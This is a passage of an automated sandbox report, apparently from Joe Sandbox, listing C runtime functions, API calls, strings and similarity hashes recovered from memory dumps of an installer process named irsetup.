DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F42D
DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F43C

Part of subcall function 000000018003A43C: _errno.LIBCMT ref: 000000018003A445

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4B9

Part of subcall function 000000018002C04C: realloc.LIBCMT ref: 000000018002C077
Part of subcall function 000000018002C04C: Sleep.KERNEL32(?,?,00000000,000000018002F4A9,?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002C093

EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4C8
EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4D4

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction ID: c9725b456daa9fdbd47dcba6a1973a2d1d59f8ec4ab8946eea0d685f15fedc00
Opcode Fuzzy Hash: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
Instruction Fuzzy Hash: D221D331301A4C81EAA3AF21E8457EBA391B34D7C0F44C835BA4D0778AEEB8C28CC341

Function 00007FF7C0517EE4 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF7C0517F1B
GetCurrentProcessId.KERNEL32 ref: 00007FF7C0517F26
GetCurrentThreadId.KERNEL32 ref: 00007FF7C0517F32
GetTickCount.KERNEL32 ref: 00007FF7C0517F3E
QueryPerformanceCounter.KERNEL32 ref: 00007FF7C0517F4F

Memory Dump Source

Source File: 00000002.00000002.4651782451.00007FF7C02B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7C02B0000, based on PE: true

Associated: 00000002.00000002.4651706575.00007FF7C02B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4652583327.00007FF7C060A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4652865919.00007FF7C0739000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4652947679.00007FF7C0746000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653023370.00007FF7C0749000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653023370.00007FF7C0755000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653023370.00007FF7C0767000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653337272.00007FF7C076A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653449861.00007FF7C078F000.00000010.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.4653541368.00007FF7C0792000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c02b0000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction ID: deebdf01b9e4bc0b5b8069d4c7afefe4e0d7afd1f30ca2e19e306798f06f31a4
Opcode Fuzzy Hash: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
Instruction Fuzzy Hash: F601C831A6CA0682EB409F21F840265B370FB08BE1F842531EE9E87794CF3CE9858790

Function 0000000180038EBC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180038EF3
GetCurrentProcessId.KERNEL32 ref: 0000000180038EFE
GetCurrentThreadId.KERNEL32 ref: 0000000180038F0A
GetTickCount.KERNEL32 ref: 0000000180038F16
QueryPerformanceCounter.KERNEL32 ref: 0000000180038F27

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction ID: 243d979cf980d91638068ba1cf51c6dd2d398df9d072928e8bbb030d2aa91185
Opcode Fuzzy Hash: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
Instruction Fuzzy Hash: FC015E31215A0886EBE28F21F9803966360F74DBD4F46A621FE5E477A4DF39CA9D8300

Function 00000001800324A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002BAAC: _errno.LIBCMT ref: 000000018002BAB5

_errno.LIBCMT ref: 00000001800324D5
_errno.LIBCMT ref: 00000001800324F1
_getbuf.LIBCMT ref: 000000018003255E

Strings

%.14g, xrefs: 00000001800324BA

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getbuf
String ID: %.14g
API String ID: 606515832-3267037135
Opcode ID: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction ID: d7cf500bb31369f41dd2bf305ad7167dfc6d28a841a02d62a1bb6ec0d038c543
Opcode Fuzzy Hash: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
Instruction Fuzzy Hash: 5A41C272600B4886EBAB9F28D4513AE37A0E78CFD4F168215FA6A473D6DF34CA55C740

Function 000000018000E020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018000E0A4

Part of subcall function 0000000180022200: _errno.LIBCMT ref: 000000018002221E

Strings

cur, xrefs: 000000018000E065
FILE*, xrefs: 000000018000E02F
attempt to use a closed file, xrefs: 000000018000E04C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno
String ID: FILE*$attempt to use a closed file$cur
API String ID: 2918714741-2248676531
Opcode ID: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction ID: 6c949a32b7c445aad4823cac95b0331f89fcc6844e5a922ae23727c4ae02fac2
Opcode Fuzzy Hash: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
Instruction Fuzzy Hash: CB216F71705A4881FB92EB52E5913EA6365E78DBC0F45C022FE4917B9ACE38C74E8740

Function 000000018000E2E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

fflush.LIBCMT ref: 000000018000E31E
_errno.LIBCMT ref: 000000018000E32A

Strings

FILE*, xrefs: 000000018000E2EF
attempt to use a closed file, xrefs: 000000018000E30C

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errnofflush
String ID: FILE*$attempt to use a closed file
API String ID: 748766958-999929173
Opcode ID: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction ID: effcfa852fb6302185ee5319f9c93b9d90322d014ae9de1df5db582a5132b004
Opcode Fuzzy Hash: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
Instruction Fuzzy Hash: F7117C31704A8881FB82EB52E1913EA6361A789BC0F448022BE0917B9ACE6CC6898740

Function 000000018002E4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 000000018002E4EA
_lock.LIBCMT ref: 000000018002E518
free.LIBCMT ref: 000000018002E54F

Strings

%.14g, xrefs: 000000018002E4E5

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd_lockfree
String ID: %.14g
API String ID: 3892346632-3267037135
Opcode ID: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
Instruction ID: 4a9433009a0817146d8213779e3cdba636acc00540cdeb6e6f7f8c89661ab616
Opcode Fuzzy Hash: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
Instruction Fuzzy Hash: A8115E31261B8882EAD79B50E4807E873A0F78DBC8F498125FA1D03791DF34CA5DC701

Function 00000001800207F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 00000001800207FF
GetProcAddress.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 0000000180020814

Strings

mscoree.dll, xrefs: 00000001800207F8
CorExitProcess, xrefs: 000000018002080A

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction ID: 8eca91b44297037b0ac9d1d6b010f20b8df3b1a68d07564286341e8c3e27f513
Opcode Fuzzy Hash: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
Instruction Fuzzy Hash: D7E01234B11B0851FE9B5F91A8E43A51390AB4C780F499829985E06391DF68878D8394

Function 0000000180028C50 Relevance: 6.4, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92

Part of subcall function 000000018002FF88: _errno.LIBCMT ref: 000000018002FFA3

free.LIBCMT ref: 0000000180028D99
free.LIBCMT ref: 0000000180028DB5

Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A

free.LIBCMT ref: 0000000180028DCA

Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334

free.LIBCMT ref: 0000000180028DE9
free.LIBCMT ref: 0000000180028E05

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentSleepTerminateUnwindVirtualmalloc
String ID:
API String ID: 1498969394-0
Opcode ID: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction ID: e4a9b29ca778be11defb2c39dc2281dcbbc2f6ed8a753c597f6380265792a982
Opcode Fuzzy Hash: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
Instruction Fuzzy Hash: 1D517236201E4886EBA39F25E8403DD3355F788BD8F598026FE8D47795DE38CA8AC344

Function 0000000180029078 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00000001800290AA

Part of subcall function 0000000180028E38: _getptd.LIBCMT ref: 0000000180028E72

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _getptd
String ID:
API String ID: 3186804695-0
Opcode ID: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction ID: 8693baa525cc390d4e04389ed9084d09a48d9bf4543c762d9cd6e86b7275e954
Opcode Fuzzy Hash: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
Instruction Fuzzy Hash: 5281B072205B8996EBA6DF65E1847DE73A0F3487C4F508126EB8D43B94DF38D258CB00

Function 0000000180039880 Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018002D20C: _FF_MSGBANNER.LIBCMT ref: 000000018002D233

_lock.LIBCMT ref: 00000001800398BE
_lock.LIBCMT ref: 0000000180039917
EnterCriticalSection.KERNEL32 ref: 0000000180039956
LeaveCriticalSection.KERNEL32 ref: 0000000180039966

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalSection_lock$EnterLeave
String ID:
API String ID: 2641352136-0
Opcode ID: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction ID: f39b5f0a46982969517bee665c5b07b8d69fc09acf0904b0d854b37e53922783
Opcode Fuzzy Hash: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
Instruction Fuzzy Hash: 9D510932201B8886EB93CF55E4403AA7791F7987E8F46C216FA5A067E5CF78C619C701

Function 00000001800295A4 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001800295CB

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_getptd.LIBCMT ref: 00000001800295F1
_lock.LIBCMT ref: 000000018002962A
_lock.LIBCMT ref: 00000001800296BD

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _lock$DecodePointer_errno_getptd
String ID:
API String ID: 4201827665-0
Opcode ID: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction ID: 460a503547ebc5d843fb0f47162114160bb622de7595eaa0c997af710718bdb1
Opcode Fuzzy Hash: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
Instruction Fuzzy Hash: D151AC31602A8886F7D7EB25E884BEA2391FB4D7C8F11C525FE5A43792DE78C6498704

Function 000000018002C178 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(?,?,?,?,0000000180029F37), ref: 000000018002C187
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1A6
free.LIBCMT ref: 000000018002D1AF
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180029F37), ref: 000000018002D1CF

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: CriticalDeleteSection$Freefree
String ID:
API String ID: 1250194111-0
Opcode ID: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction ID: 70892d1e86e0fe61b579319fcbecef8552250517042c71bfe73d972997a8cc6e
Opcode Fuzzy Hash: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
Instruction Fuzzy Hash: 51119E31605A4CD6FBA78B11E9503A97360E70DBE4F588212FA5502B95CF68CAA9C701

Function 000000018001E96C Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000000018001E981

Part of subcall function 000000018002BCAC: DecodePointer.KERNEL32 ref: 000000018002BCD3

_flush.LIBCMT ref: 000000018001E9AA
_freebuf.LIBCMT ref: 000000018001E9B4

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: DecodePointer_errno_flush_freebuf
String ID:
API String ID: 1889905870-0
Opcode ID: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction ID: 21c6b32f25e86580c02bfc281b2be964b159bf8c721c44a871fe3adfba9ac30f
Opcode Fuzzy Hash: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
Instruction Fuzzy Hash: 6801D432614A8842FFE7EA7598123FD12516B9E7E8F29C322BA15871D2CE38C6088301

Function 000000018003972C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 0000000180039735
_errno.LIBCMT ref: 000000018003973D

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction ID: 222b8468457cde4f875127d20ef24c91f9358582f200ea179a318cfe432f40bb
Opcode Fuzzy Hash: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
Instruction Fuzzy Hash: 54012B72625A8C41FB975FA9C8513FD275197997E5F92C302FA2E063E2CF3C42088701

Function 0000000180028434 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 00000001800285BC
_errno.LIBCMT ref: 00000001800285F6

Strings

#, xrefs: 0000000180028554

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: #
API String ID: 3432092939-1885708031
Opcode ID: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction ID: a15908a98ec50fe91217ef7d26e318360d1aa3a5f1900967077516d825dfa4f5
Opcode Fuzzy Hash: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
Instruction Fuzzy Hash: B5518236206BD885E7A38F15E4403EEBBA0F789B94F548111EB8953B55CE39C949DB01

Function 00000001800265D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 000000018001F6B0: _getptd.LIBCMT ref: 000000018001F6C6

_errno.LIBCMT ref: 0000000180026609
_errno.LIBCMT ref: 0000000180026707

Strings

-, xrefs: 00000001800266D9

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd

Similarity

API ID: _errno$_getptd
String ID: -
API String ID: 3432092939-2547889144
Opcode ID: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
Instruction ID: 18eb19642d1af780b867c0ab745fc5cb88b23faebf2bc774daddc210fbea8dfb
Opcode Fuzzy Hash: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
Instruction Fuzzy Hash: 5941D672904B8881E7A38B25E4543EA77A0F75ABD5F15C222FB9807BE4CF38C659C700

Function 000000018001EA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_getbuf.LIBCMT ref: 000000018001EB44

Part of subcall function 000000018002BAAC: _errno.LIBCMT ref: 000000018002BAB5

_errno.LIBCMT ref: 000000018001EAF5

Strings

@, xrefs: 000000018001EB61

Memory Dump Source

Source File: 00000002.00000002.4651299801.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000002.00000002.4651209624.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651455562.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651534708.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4651613781.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

